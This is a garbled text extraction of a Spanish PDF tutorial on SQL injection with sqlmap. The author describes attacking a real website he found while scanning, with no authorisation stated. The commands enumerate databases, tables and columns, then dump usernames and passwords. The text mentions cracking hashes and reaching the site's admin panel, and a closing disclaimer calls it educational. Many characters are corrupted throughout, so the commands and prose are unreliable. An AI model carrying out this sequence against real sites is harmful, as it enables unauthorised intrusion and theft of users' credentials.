8/11/2019 Inyeccion Sql pentesting con kali.pdf

1/3

Daniel Candia

Inyeccion Sql :

Escanendo algunas webs encontre un error de SQLI Veamos que paso

La web ya no esta disponible asi que mostrare la Url

Teniendo el link indicado buscaremos las bases de datos disponibles en dicha pagina con Sqlmapsqlmap u web!ulnerable "dbs

#qui podemos !er las $ases de datos encontradas

En este caso la que nos ineresa es la primera asi que ahora sacaremos las tablas

sqlmap u web!ulnerable % basadedatos "tables

#qui !emos las tablas encontradas

https://www.facebook.com/eduardo.d.castillo?fref=nfhttps://www.facebook.com/eduardo.d.castillo?fref=nf

8/11/2019 Inyeccion Sql pentesting con kali.pdf

2/3

#hora la que neecsitamos es &ingreso& para buscar credenciales de acceso Intentaremos sacar las

columnassqlmap u web!ulnerable % basededatos T tablaelegida "columns

'olumnas encontradas

Elegiremos las posibles importantes ( para obtener user y pass

sqlmap u web!ulnerable % basededatos T tablaelegida ' columnas "dump

) las credenciales se muestran tal cual

en algunas ocasionaes eel pass !iene encriptado y habra que usar *indmyhash o algun otro metodosi Sqlmap no logra hacerlodespues de esto habra que buscar el panel de administracion Eso +, lo mostrare para no a-ectar la

web cuando sea restablecida

8/11/2019 Inyeccion Sql pentesting con kali.pdf

3/3

bueno ahi ya lo mostre sin querery aqui tenemos el acceso al .anel de #dministracion

La presentacion es con *ines didacticos y de aprendi/a0e ( +ingun administrador del grupo esresponsable del Uso de este .ost1 2racias